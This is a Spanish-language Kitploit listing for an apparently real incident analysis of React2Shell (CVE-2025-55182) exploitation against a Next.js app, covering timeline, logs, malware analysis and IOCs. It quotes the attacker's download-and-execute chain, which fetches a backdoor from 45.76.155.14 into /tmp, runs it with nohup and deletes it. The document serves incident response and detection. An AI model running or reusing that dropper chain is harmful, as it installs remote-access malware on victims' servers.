Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-Attack-Analysis — Análisis de ataques del mundo real de CVE-2025-55182 (React2Shell) - Vulnerabilidad RCE en React Server Components | Kitploit
Herramientas/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
Gestión de Indicadores de Compromiso (IOC)Análisis de VulnerabilidadesAnálisis ForenseSeguridad WebAnálisis de MalwareInteligencia de AmenazasAprendizaje y EducaciónRespuesta a Incidentes

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

Análisis de ataques del mundo real de CVE-2025-55182 (React2Shell) - Vulnerabilidad RCE en React Server Components

Ver Repositorio
16hace 9 mesesAún no revisado
Compartir

Análisis del ataque CVE-2025-55182: RCE en React Server Components

Análisis de un ataque real en una aplicación Next.js de producción

📋 Tabla de Contenidos

  • Resumen Ejecutivo
  • Resumen de la Vulnerabilidad
  • Cronología del Ataque
  • Análisis Técnico
  • Análisis del Malware
  • Indicadores de Compromiso (IOCs)
  • Mitigación y Respuesta
  • Lecciones Aprendidas
  • Referencias

Resumen Ejecutivo

El 5 de diciembre de 2025, nuestra aplicación Next.js de producción fue el objetivo de atacantes que explotaban CVE-2025-55182 (React2Shell), una vulnerabilidad crítica de ejecución remota de código en React Server Components. El ataque intentó descargar y ejecutar un troyano backdoor de Linux en nuestro servidor.

AtributoValor
ID de CVECVE-2025-55182
Puntuación CVSS9.8 (Crítico)
Fecha del ataque5 de diciembre de 2025
Resultado del ataque✅ Bloqueado (post-parche)
Tipo de malwareTroyano backdoor de Linux
Stack afectadoNext.js + React Server Components

Resumen de la Vulnerabilidad

¿Qué es CVE-2025-55182?

CVE-2025-55182, también conocido como "React2Shell", es una vulnerabilidad crítica de ejecución remota de código (RCE) que afecta a React Server Components (RSC) en:

  • React: versiones 19.0.0 - 19.2.1
  • Next.js: versiones 15.x y 16.x (antes de los parches)

Causa Raíz

La vulnerabilidad existe en la función renderToReadableStream() dentro del Flight Server de React. Al procesar payloads de RSC especialmente diseñados, el servidor no sanea correctamente ciertas entradas, lo que provoca ejecución arbitraria de código.

Vector de Ataque

Attacker → Malicious RSC Payload → Flight Server → eval() → RCE

El atacante envía una solicitud POST manipulada con un payload serializado malicioso que se deserializa y se ejecuta en el servidor.


Cronología del Ataque

Fase 1: Intentos iniciales de explotación (Pre-parche)

Marca de tiempo (UTC)Evento
5 dic, 06:20Primer ataque detectado vía Sentry
5 dic, 06:20El payload intenta ejecutar comandos de shell
5 dic, 06:20Ataque parcialmente exitoso (pre-parche)

Registro de error de Sentry (Pre-parche):

Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

Fase 2: Implementación del parche

Marca de tiempoAcción
4 dic, 14:13Actualizado a Next.js 16.0.7
4 dic, 14:13Versión parcheada desplegada (v1.0.0-beta-4)

Fase 3: Ataque post-parche bloqueado

Marca de tiempo (UTC)Evento
5 dic, 08:48Intento de ataque detectado
5 dic, 08:48Ejecución del payload BLOQUEADA
5 dic, 08:48Error: syntax error: unexpected ";"

Registro de error de Sentry (Post-parche):

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

El parche evitó con éxito que el comando malicioso se ejecutara.


Análisis Técnico

Detalles de la solicitud de ataque

AtributoValor
URL objetivohttps://[REDACTED]/
MétodoPOST
User-AgentPython Requests 2.31
OrigenScript de ataque automatizado

Análisis del Payload

El atacante intentó ejecutar la siguiente cadena de comandos:

wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

Desglose:

PasoComandoPropósito
1wget http://45.76.155.14/vim -O /tmp/vimDescargar malware
2chmod +x /tmp/vimHacerlo ejecutable
3nohup /tmp/vim > /dev/null 2>&1 &Ejecutarlo en segundo plano, persistir tras cerrar sesión
4rm -f /tmp/vimEliminar evidencias

Entorno del servidor

ComponenteVersión
SOAlpine Linux 3.23.0
RuntimeNode.js v20.19.6
FrameworkNext.js 16.0.7 (parcheado)
ContenedorDocker

Análisis del Malware

Información del archivo

AtributoValor
Nombre de archivovim (disfrazado como herramienta legítima)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
Tipo de archivoELF 64-bit LSB executable, x86-64
LenguajeGo (binario compilado)
Tamaño del archivo~4.7 MB

Resultados de VirusTotal

Tasa de detección: 13/72 (18%)

ProveedorNombre de detección
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292

Enlace de VirusTotal: Ver análisis

Análisis del binario

Cabecera ELF:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

Capacidades identificadas:

CapacidadEvidencia
Cliente HTTP/HTTPSnet/http, *http.Client
Cifrado TLScrypto/tls, crypto/aes
Proxy SOCKS5socks, socks5
Resolución DNSnet/dns/dnsmessage
Criptografía fuertechacha20poly1305, Ed25519

Cadenas extraídas (relevantes):

crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

Reglas IDS activadas

SeveridadReglaFuente
LOWET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
LOWET DNS Query for .cc TLDProofpoint ET Open

Clasificación del malware

Tipo: Troyano backdoor de Linux

Capacidades:

  • Acceso remoto a shell
  • Comunicación de comando y control (C2)
  • Carga/descarga de archivos
  • Comunicaciones cifradas
  • Tunelización de tráfico mediante SOCKS5
  • Mecanismos de persistencia

Indicadores de Compromiso (IOCs)

IOCs de red

TipoValorDescripción
Dirección IP45.76.155.14Servidor de distribución de malware
URLhttp://45.76.155.14/vimURL de descarga del malware
AlojamientoVultr VPSProveedor de nube
TLD.ccEl dominio C2 utiliza el TLD .cc

IOCs de archivo

TipoValor
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Calcular si es necesario]
MD5[Calcular si es necesario]
Nombre de archivovim (disfrazado)
Tipo de archivoELF 64-bit x86-64
Tamaño del archivo~4.7 MB

IOCs de comportamiento

IndicadorDescripción
wget hacia IP externaDescargas desde URLs no estándar
Archivos en /tmp/Ejecutable sospechoso en el directorio temporal
nohup + ejecución en segundo planoIntento de persistencia
Eliminación inmediata de archivosLimpieza de evidencias
User-Agent de Python RequestsHerramienta de ataque automatizada

Regla YARA

Descargar herramienta